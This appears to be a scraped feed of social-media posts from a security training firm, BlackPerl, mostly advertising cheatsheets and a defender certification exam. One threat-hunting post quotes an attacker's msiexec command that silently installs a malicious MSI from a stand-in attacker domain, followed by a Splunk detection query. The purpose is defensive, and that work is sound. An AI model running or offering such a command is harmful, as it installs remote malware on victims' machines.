BlackPerl

Here is one quick content and reference to understand the Process Injection In windows. We hope you find it useful.

As we keep pushing much for cheatsheets and contents for you to consume. We thought sometimes, you may lose the track, So we will be adding all of our new cheatsheets in below git. So far it has around 50 of them. More to come. We hope this will be useful for all of you.

I’m happy to share that I’ve obtained a new certification: Threat Hunting 201 from BlackPerl!

It is time for you to test your knowledge Skills. First time ever, we have made our BCAD (Certified Advanced Defender) Certification Exam available for all of you. You can test your DFIR, SOC, SecOps Knowledge in the process of this exam. 1. The Exam is of 24 hours of real hands-on exam. 2. You have given 2 compromised machine and compromised incident scenario. 3. You are allowed to use any tools, technology you want to use. 4. You need to write a detailed investigation report and submit within this 24 hours. We will verify it and comeback with our feedback. 5. You can 2 attempts within this price point. So don't wait; and enroll today- https://lnkd.in/gQEkvaFy

After a lot of thoughts, we are making the BCAD (BlackPerl Certified Advanced Defender) Certification Exam available to public. If you want to test your capability with 2 real world investigation, you can do it anytime. You can write your assessment at just 60USD (5000INR). 1. The Exam is of 24 hours of real hands-on exam. 2. You have given 2 compromised machine and compromised incident scenario. 3. You are allowed to use any tools, technology you want to use. 4. You need to write a detailed investigation report and submit within this 24 hours. We will verify it and comeback with our feedback. 5. You can 2 attempts within this price point. This assessment is just a testament of what you know, challenge yourself in Investigation thought process of real world compromise scenario and prepare yourself for your next interview. You can enrol it using the link- https://lnkd.in/gzk6JxB3 People who are interested, in joining our October batch of BCAD, the registration is open now. And you can enroll using the Link- https://lnkd.in/gwmyGkyY If you are joining BCAD Engagement Batch, you get complementary access to the exam plus our Academy course learning paths. Happy Defending! I will see you in BCAD.

Students who wants to start a career in Cyber Security and want to get into SOC, below are some basic L1 stuff you should know. Hope you find it useful.

For someone looking into doing a pentest in docker. Here is quick handy guide!

Network Drive is something not very frequently monitored by Defenders. I have experienced usage of network drive to internet to map eric zimmerman's tool library, so attacker can use this. On a recent Client Threat Hunt engagement BlackPerl found; 𝘮𝘴𝘪𝘦𝘹𝘦𝘤.𝘦𝘹𝘦 /𝘪 \\𝘢𝘵𝘵𝘢𝘤𝘬𝘦𝘳𝘥𝘰𝘮𝘢𝘪𝘯[.]𝘪𝘯𝘧𝘰@80\𝘴𝘩𝘢𝘳𝘦\𝘴𝘭𝘢𝘤𝘬.𝘮𝘴𝘪 /𝘲𝘯 If a drive is successfully mapped, the script constructs a command to remotely install a .msi package from the mapped network drive (slack.msi) using msiexec.exe. Now this slack binary is a malicious one present in attacker domain. Also, notice, The /𝘲𝘯 flag at the end of the script represents “𝘲𝘶𝘪𝘦𝘵, 𝘯𝘰 𝘜𝘐”, meaning the installation will run silently without displaying any user interface. After executing msiexec, the script then attempts to dismount the network drive. Splunk Query: index=* (result.CommandLine=\"*\\\\\\\\attackerdomain@SSL\\\\share\\\\*\" result.CommandLine=\"*net use*\") OR (CommandLine=\"*\\\\\\\\attackerdomain.info@SSL\\\\share\\\\*\" CommandLine=\"*net use*\") OR (ParentCommandLine=\"*\\\\\\\\attackerdomain.info@SSL\\\\share\\\\*\" ParentCommandLine=\"*net use*\") OR (process_exec=\"*\\\\\\\\attackerdomain.info@SSL\\\\share\\\\*\" process_exec=\"*net use*\") OR (command_line=\"*\\\\\\\\attackerdomain.info@SSL\\\\share\\\\*\" command_line=\"*net use*\") OR (Process_Command_Line=\"*\\\\\\\\attackerdomain.info@SSL\\\\share\\\\*\" Process_Command_Line=\"*net use*\") Alarm to Threat Hunters, this can be an interesting hypothesis to look into.

We often struggle with Supply Chain attacks and also as Security Professionals we are grasping GitOps, but not very easy to map this with threat blue prints and understand which action of Git should be under radar until now. Kudos to awesome research by John Stawinski and Adnan Khan. You can check our the Common attack paths for identifying GitHub Actions with their vulnerabilities. Github Repo: https://lnkd.in/gfnqjiGE Slides from DefCon: https://lnkd.in/gHGsPgeZ Slides from Blackhat: https://lnkd.in/gCg7nq6v